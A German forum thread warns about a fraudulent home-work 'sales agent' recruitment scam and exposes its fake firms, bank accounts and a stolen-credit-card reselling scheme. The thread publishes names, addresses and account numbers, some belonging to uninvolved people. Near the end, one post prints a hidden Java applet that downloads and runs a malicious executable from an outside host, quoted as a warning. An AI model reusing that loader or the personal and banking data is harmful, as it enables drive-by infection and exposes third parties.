Lava2crew / Markus Bilinski - betrügerische Verkaufsagentenanwerbung - DigiTech in neuem Gewand

    • atropa_belladonna! schrieb:

      forenuser mache weiter so :thumbsup:

      Ja sicher Bella ;)

      Deren DDOS hatte sogar einen Vorteil! Ich hatte mehr Zeit um Verkaufsagenten zu suchen :D

      Und wenn die "ANTIfrauds" meinen, das man nur über diesen Thread die Verkaufsagenten vor deren Machenschaften und Konten warnen kann, dann haben die sich aber ordentlich geschnitten!
    • Im Zusammenhang mit der hier thematisierten Bande möchte ich mal auf einen TV-Bericht hinweisen!

      Am 23.08.2011 um 18:20 Uhr im WDR Köln - Servicezeit

      Spitzenverdienst durch Heimarbeit?

      Kann man reich werden, ohne das Haus zu verlassen? Das Internet verspricht: Mit dem richtigen Nebenjob verdient sich das Geld von ganz alleine. Doch die wenigsten Heimarbeitsangebote sind wirklich lukrativ, und manche sind sogar kriminell.

      Ich antworte mal vorab für mich:

      Aber sicher kann man dabei reich werden!
      Reich an Erfahrungen!
      Nur kosten die dann meisten jede menge Lehrgeld!
    • crew2sell, Andreas Kern, Bremen

      Wie die DDOS ja zeigte, wurde der Bande in den letzten Wochen ordentlich auf die Finger gehauen. Mittlerweile wurden Zahlungen an deren Adresse in Höhe von über 20.000 EUR verhindert!

      Aber mir ist doch wahrhaftig ein Firmenkonstrukt nicht aufgefallen. Anscheinend hat ANTIfraud es auch erst ende letzte Woche wieder entdeckt ;)

      Über Ebay-Kleinanzeigen wurden bereits vor fast einem Monat über dieses Konstrukt Stellenanzeigen geschaltet. Die hat Ebay aber anscheinend alle selbst entdeckt und mittlerweile gelöscht. Letzte Woche, haben ANTIfraud & Co. dann nochmal nachgelegt!

      Und das sind die Daten der neuen Schein-Firma:


      crew2sell
      Andreas Kern
      Otto-Lilienthal-Straße 7
      28199 Bremen
      crew2sell@googlemail.com



      Und hier wird es nun kritisch!

      Die Zahlungen sollen nun auf eine PrePaid-Kreditkarte erfolgen, getarnt als normales Bankkonto! Die eigentliche PrePaid-Kreditkarte verbirgt sicht hinter dem Verwendungszweck. Die Vincento Payment Solutions Ltd. leitet die Überweisung dann an diese Kreditkarte weiter!


      Kontoinhaber: Vincento Payment Solutions Ltd.
      Kontonummer: 0000054902
      Bankleitzahl: 51230800
      Bankname: Wirecard Bank AG
      Verwendungszweck: 1060020886





      Überweist auf keinen Fall auf das Konto!
      Durch die PrePaid Kreditkarte dürfte euer Geld
      unwiederbringlich weg sein!
      Die Möglichkeit einer Stornierung der Wertstellung
      ist mir hier nicht bekannt!



      Über die "Vincento Payment Solutions Ltd." findet man folgendes:

      Kalixa & Sicherheit

      Hier erfahren Sie, welche Maßnahmen wir ergreifen, um Sie vor Internet-Betrug zu schützen (...)

      Was wir tun, um Ihre persönlichen Daten zu schützen


      Vincento Payment Solutions Ltd und sein Zahlungsanbieter CQR Payment Solutions GmbH verpflichten sich, Ihre Daten zu schützen. (...)

      und weiter auf der selben Seite:

      Sie benötigen nur eine gültige Postanschrift und eine E-Mail-Adresse.

      kalixa.com/de-de/Guest-Areas/Ihre-Kalixa/Your-security/

      Naja, ich vermute mal, das bei denen mit Sicherheit nicht deren Postanschrift geprüft wurde! :cursing:
      Bilder
      • eBay Kleinanzeigen - Andere Anzeigen des Anbieters.jpeg

        127,39 kB, 1.349×880, 250 mal angesehen
      • 4x Freundliche Mitarbeiter-in gesucht ab sofort..jpeg

        667,26 kB, 1.349×6.441, 179 mal angesehen
    • Video fehlt: Netzwerkfehler beim WDR

      Das Video im o.g. Beitrag ist auf WDR nicht aufrufbar: Netzwerkfehler. Kann man glauben -muß man nicht. Man kann seine Frage diesbezüglich an warumweg@wdr.de stellen. Das habe ich mal gemacht.
      Guten Tag,
      beim Aufruf der Seite wdr.de/tv/servicezeit/sendungs…47/1123/00_heimarbeit.jsp wird das Video nicht angezeigt. Angeblich Netzwerkfehler.
      Hat "Myelectronic24" Zugriff auf Ihre Serversysteme und belastendes Material in freiwilliger Selbstkontrolle gelöscht? Wäre schön wenn der Beitrag bald wieder abrufbar wäre.
      Mt freundlichen Grüßen,

      Mal sehen was die Kollegen vom Sender antworten.
      ___________________________________________
      Kaum macht man es richtig, schon funktioniert es.
    • Mittlerweile ist auch einen PDF zu der Sendung online. Darin schreibt der WDR zu diesem Thema:

      3. Strohmann gesucht? eBay-Verkäufer auf Provisionsbasis

      Unser letzter Versuch, von zu Hause aus Geld zu verdienen: Eine Elektronikfirma namens „My-electronic24“ sucht Heimarbeiter, die in ihrem Auftrag Anzeigen bei eBay schaltet. Zehn Prozent Provision werden versprochen. Die Geschäftsidee: Man bekommt eine fertige Produktbeschreibung gemailt, die man nur noch unter dem eigenen Namen bei eBay einstellen muss. Wenn ein Kunde anbeißt, lässt man sich den Kaufpreis überweisen. Bei einem Fernseher für 500 Euro darf man 50 Euro behalten, den Rest überweist man auf das Konto des Auftraggebers, der verspricht, den Fernseher von seinem Geschäftssitz in Neumünster (Schleswig-Holstein) aus zu verschicken.

      Schnell verdientes Geld, könnte man meinen, aber leider um den Preis, womöglich ungewollt zum Handlanger unseriöser Geschäfte zu werden.

      Der Haken: Die Ware bekommt man nie zu Gesicht, aber wenn etwas schiefläuft, trägt man das volle Risiko. Schlimm, wenn man erst dann feststellt, dass der vermeintliche Geschäftspartner nicht greifbar ist. Denn die im Impressum von Myelectronic24 angegebene Adresse existiert nicht. Die „Rubenstraße“ in Neumünster ähnelt zwar der „Rubensstraße“ mit zwei „s“, die es tatsächlich gibt. Doch selbst wenn es nur ein Tippfehler wäre – die angegebene Hausnummer 56 sucht man vergebens. Die Rubensstraße endet bei Hausnummer 28 in einem Wendehammer. Wo also sollen die Fernseher und Computer gelagert sein, von denen die Rede ist?

      Die Pressestelle der Auktionsplattform eBay sagt: Zum Anbieter Myelectronic24 lägen keine konkreten Beschwerden vor. Die Einschätzung aufgrund von Erfahrungen mit ähnlichen Fällen ist aber folgende: „Es scheint sich nicht um ein seriöses Angebot zu handeln, deshalb können wir nur warnen.“ Im Streitfall habe der Käufer gegenüber dem Verkaufsagenten Anspruch auf die Ware oder auf Erstattung des Kaufpreises. Der Verkaufsagent handle ja in eigenem Namen.

      Fazit: Anzeige erstatten! Schlimmstenfalls kann man selbst als Betrüger dastehen, wenn man Ware verkauft, die womöglich gar nicht existiert. Dann ist man unfreiwillig als Strohmann aufgetreten und muss mit heftigen finanziellen Konsequenzen rechnen, eventuell sogar mit einer Haftstrafe.

      (...)

      wdr.de/tv/servicezeit/sendungs…kw47/1123/pdf/1123pdf.pdf


      Wie bitte? Ebay liegen keine Beschwerden vor???

      Ich glaube eher, das die Pressestelle keine Lust hatte, in der richtigen Abteilung nachzufragen. Oder die liebe Maike spielt die Serie, wie so oft, bewusst runter. Bei eBay gibt es ja keine bertrügerischen Aktivitäten!

      :lach: :lach: :lach:

      Ich erinnere nur daran!


    • Beschreibung

      Wir suchen zur Erweiterung unseres Teams
      4x Ebay Verkäufer/in auf Provisionsbasis (10%).

      Dieser unsere Produkte bei Ebay inseriert und verkauft (Heimarbeit).
      Interesse geweckt ?

      Dann schnell eine kurze Bewerbung an: sub2sell@googlemail.com

      Wir freuen uns auf Sie!

      Impressum:
      Thomas Herke
      Europaallee 7
      28309 Bremen

      [IMG:http://img7.imagebanana.com/img/ti2pskip/01Kleinanzeigen.png]
      ★ Lieber abwarten als gar nichts tun. ★
    • öhm... in der europaallee 7 ist ein ingenieurbüro...
      ein schelm, wer böses dabei denkt.


      ganz allgemein:
      ich begreif einfach nicht, wie man heutzutage noch auf sowas reinfallen kann... echt nicht.
      Those who mind don’t matter
      and those who matter don’t mind.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von riverside ()

    • Sub2Sell - sub2sell@googlemail.com Thomas Herke

      @Scharfmacher
      danke für den Hinweis. Nur muss man dazu dringend etwas mehr schreiben! Denn diesmal hat ANTIfrad die Daten einer realen Person und seiner Firma missbraucht, wie Du mittlerweile auch selbst feststellen konntest!

      Deswegen muss man dringend hervor heben, das

      Herr Thomas Herke
      Geschäftsführer der Bremer Elektrohandel Herke GmbH
      Europaallee 7
      28309 Bremen

      nichts mit dem Betrüger "ANTIfraud" zu tun hat!

      Ich persönlich würde sogar am liebsten seinen Namen und Anschrift erst gar nicht erwähnen. Das geht aber leider nicht, weil man sonst eben nicht vor der Fake-Firma warnen kann! Ich hoffe, Herr Herke sieht mir das nach und wird es verstehen. Ich vermute, das diese Warnung sogar im Sinne des dem realen Herr Herke ist. Leider konnten wir bisher noch nicht miteinander telefonieren, aber ich denke, das wird entweder heute abend oder spätestens morgen der Fall sein.

      Dazu kurz zum realen Herrn Herke:
      Bitte schauen Sie mal in ihr persöhnliches Postfach! Ich habe Ihnen heute noch eine Mail geschickt.

      Zurück zur eigentlichen Warnung vor ANTIfraud. An der E-Mail-Adresse erkennt man den eigentlich angedachten Firmennamen. Vor dieser Firma muss also gewarnt werden. Es handelt sich dabei um die Fake-Firma

      Sub2Sell
      Name und Anschrift wurde wie oben erwähnt
      von ANTIfraud geklaut und missbraucht!

      sub2sell@googlemail.com


      Wer sich bei dieser Firma bewirbt, der wird feststellen, das ANTIfraud eine neue Methode ausprobieren möchte. Man soll es kaum glauben! Dem angeworben Verkaufsagent soll tatsächlich die Ware vor dem einstellen der Auktion zugesendet werden. Der VA soll dann die Ware fotografieren und bei eBay einstellen. Nach erfolgtem Verkauf und Bezahlung soll er dann die Ware an den Käufer versenden und den Betrag abzüglich seiner 10% Provision und den eBay-Gebühren an ANTIfraud überweisen.

      Hört sich ja fast so an, als wenn ANTIfraud ehrlich werden will! Will er aber nicht! Denn wer sich seine Antwort genauer anschaut merkt sofort, was an der neuen Masche faul ist! Er beantwortet es nämlich unter den häufig gestellten Fragen FAQ unter Punkt 4:

      Warum steht auf der Rechnung das es mit einer Kreditkarte gezahlt wurde und eine andere E-mailadresse?

      So weißen wir es dem Finanzamt vor, wie und womit die Waren bezahlt wurden sind.Jeder Mitarbeiter unser Firma hat eine eigene E-mailadresse sowie verschiedene Kreditkarten. Diese werden von uns zur Verfügung stellt damit es kein durcheinander gibt.

      Wer eins und eins zusammen zählen kann, der weiß sofort, was das mit den Kreditkarten auf sich hat! Es sind alles geklaute Datensätze, die zu tausend im WWW zu finden sind!

      Aber es kommt noch dicker! In der Antwort findet man zuvor noch das:


      Sie bekommen ca 1-5 Pakete/Briefe in der Woche. Wenn sie die Artikel versteigert haben und das Geld auf Ihr Konto überwießen wurde, schicken Sie uns die Endsumme und wir schicken Ihnen dann wieder neue Ware zu.

      (...)

      Die Pakete kommen mit verschiedenen Speditionen. Mit dabei ist immer eine Rechnung. Diese ist auf Ihren Name gestellt, da immer eine 24 Monatige Garantie dabei ist.


      ANTIfraud bestellt also die Ware bei einer realen Firma (Lieferant) auf den Namen des Verkaufsagenten, bezahlt diese mit geklauten Kreditkarten und lässt die Ware dann an den Verkaufsagenten schicken. Für den Lieferanten scheint im ersten Moment alles in Ordnung zu sein. Der wacht aber auf, wenn die Zuahlung storniert wird! Und dann wird auch der Verkaufsagent aufwachen!

      Das besonders Perfide bei der Masche ist aber, das diese Betrugsmasche ohne weiteres ein paar wochen unentdeckt laufen kann. In der Zeit wird der Verkaufsagent locker einen guten 5-stelligen Betrag an ANTIfraud überwiesen haben!

      Der Schaden wird also beim einzelnen Verkaufsagenten deutlich höher liegen, als bei den Bisherigen! In den letzten 5 Wochen waren nur 3 mir bekannte Verkaufsagenten für ihn tätig, die ihm zusammen etwa 3.500 € überwiesen haben. Von 15 weiteren Verkaufsagenten hat er keinen Cent gesehen. Gute 25.000,- € sind ihm dadurch durch die Lappen gegangen!
      Und von den 3.500 € konnte er vermutlich auch nicht mehr über alles verfügen. Mindestens 900,- € dürften auf dem Konto bei der Norisbank liegen, welches eigentlich schon am nächsten Tag n.ach bekannt werden gesperrt worden sein dürfte.

      Deswegen war der ja auch so sauer! :D

      A propos Norisbank ... eh ich das vergesse!

      @ANTIfraud
      Kann es sein, das Du bei dem neuen Konto etwas durcheinander geworfen hast? Die Bankleitzahl ist FALSCH! :lach:

      Aktuell teilt er den Verkaufsagenten folgende Bankverbindung mit:

      Kontoinhaber: Dudziak Tomasz
      Kontonummer: 434091500
      Bankleitzahl: 76026000
      Bankname: Norisbank


      Dieses Konto unter der Bankleitzahl gehört aber einer unbeteiligten dritten Person, die sich jetzt wundern könnte, das plötzlich unerklärliche Geldeingänge dort verbucht werden!

      ANTIfraud, ich helf Dir mal ;)
      Die richtige Bankverbindung zu dem Konteninhaber und dieser Kontonummer lautet:

      Kontoinhaber: Dudziak Tomasz
      Kontonummer: 434091500
      Bankleitzahl: 10077777
      Bankname: Norisbank


      Aber das dürften Dir jetzt auch nichts mehr nützen! :]
      Sorry, musst du Dir also wieder ein neues Konto mit gefälchten Papieren anlegen. Ob das Dir dann etwas bringen wird, wird sich zeigen!



    • die mich-seite ist leer... ?(



      btw: war mir schon klar, das die adresse geklaut ist.
      ich meinte das so, das am ende womöglich noch einer denkt, dieses ingenieurbüro würde da mitmischen und sich was dazu verdienen ;) und dem ist wohl nicht so.
      Those who mind don’t matter
      and those who matter don’t mind.
    • Es ist klar, dass das jedem erfahrenen User hier klar erkenntlich ist. Das gilt aber nicht für jeden Leser.

      Es kann sich sehr geschäftsschädigend auswirken, wenn auch nur der geringste Zweifel aufkommen könnte.
      Aus diesem Grund musste das ganz eindeutlich kenntlich gemacht werden.
    • *alte_eule* schrieb:


      Es ist klar, dass das jedem erfahrenen User hier klar erkenntlich ist. Das gilt aber nicht für jeden Leser.

      Es kann sich sehr geschäftsschädigend auswirken, wenn auch nur der geringste Zweifel aufkommen könnte.
      Aus diesem Grund musste das ganz eindeutlich kenntlich gemacht werden.



      genau das meinte ich doch ?(
      nichts anderes wollte ich deutlich machen.
      Those who mind don’t matter
      and those who matter don’t mind.
    • Ein wichtiger Hinweis für die Leser dieses Threads!


      Ich habe den Link den ANTIfraud oben gepostet hatte entfernt, weil dieser wohlmöglich nicht ganz sauber war.
      In dem Link könnte vermutlich ein recht neuer Exploit versteckt worden sein!


      Wenn ihr diesen Link angeklickt habt, dann könnte sich diese exe.Datei auf euren Rechnern installiert haben.
      Wahrscheinlich aber nur dann, wenn ihr eine Java-Version bis 6.23 auf euren Rechner installiert habt.
      Was diese exe-Datei dann bewirken kann, ist nicht bekannt.

      Die Betroffenen sollten ihre Rechner jedenfalls auf Herz und Nieren überprüfen!


      Welche Version ihr installiert habt, könnt ihr mit dem Link überprüfen:

      Versteckt im Quellcode der Seite steht:

      Quellcode

      1. <applet width='0px' height='0px' code='SlaveTech.class' archive='SlaveTech.jar'>
      2. <param name="byzd8b2xll" value="http://www.slavetech.de/gratisguthaben.exe">
      3. <param name="lkz69pax7n" value="gratisguthaben.exe">
      4. <param name="aof2y4ih78" value="http://skyline.24.eu/iadmin/index.php?action=add&redirect=http://www.slavetech.de/&run=yes">
      5. <param name="wwc25cwkn9" value="http://skyline.24.eu/iadmin/index.php?action=add&redirect=http://www.slavetech.de/&run=no">
      6. </applet>


      VirusTotal stuft die exe jedenfalls nicht als sehr vertrauenswürdig ein!
      virustotal.com/file-scan/repor…ebbbacd8276137-1322947957
    • forenuser schrieb:

      Im Zusammenhang mit der hier thematisierten Bande möchte ich mal auf einen TV-Bericht hinweisen!

      Am 23.08.2011 um 18:20 Uhr im WDR Köln - Servicezeit

      Spitzenverdienst durch Heimarbeit?

      Kann man reich werden, ohne das Haus zu verlassen? Das Internet verspricht: Mit dem richtigen Nebenjob verdient sich das Geld von ganz alleine. Doch die wenigsten Heimarbeitsangebote sind wirklich lukrativ, und manche sind sogar kriminell.

      Ich antworte mal vorab für mich:

      Aber sicher kann man dabei reich werden!
      Reich an Erfahrungen!
      Nur kosten die dann meisten jede menge Lehrgeld!

      Wow offenbar darf der WDR das Video nicht mehr online haben, es ist nicht mehr zu sehen...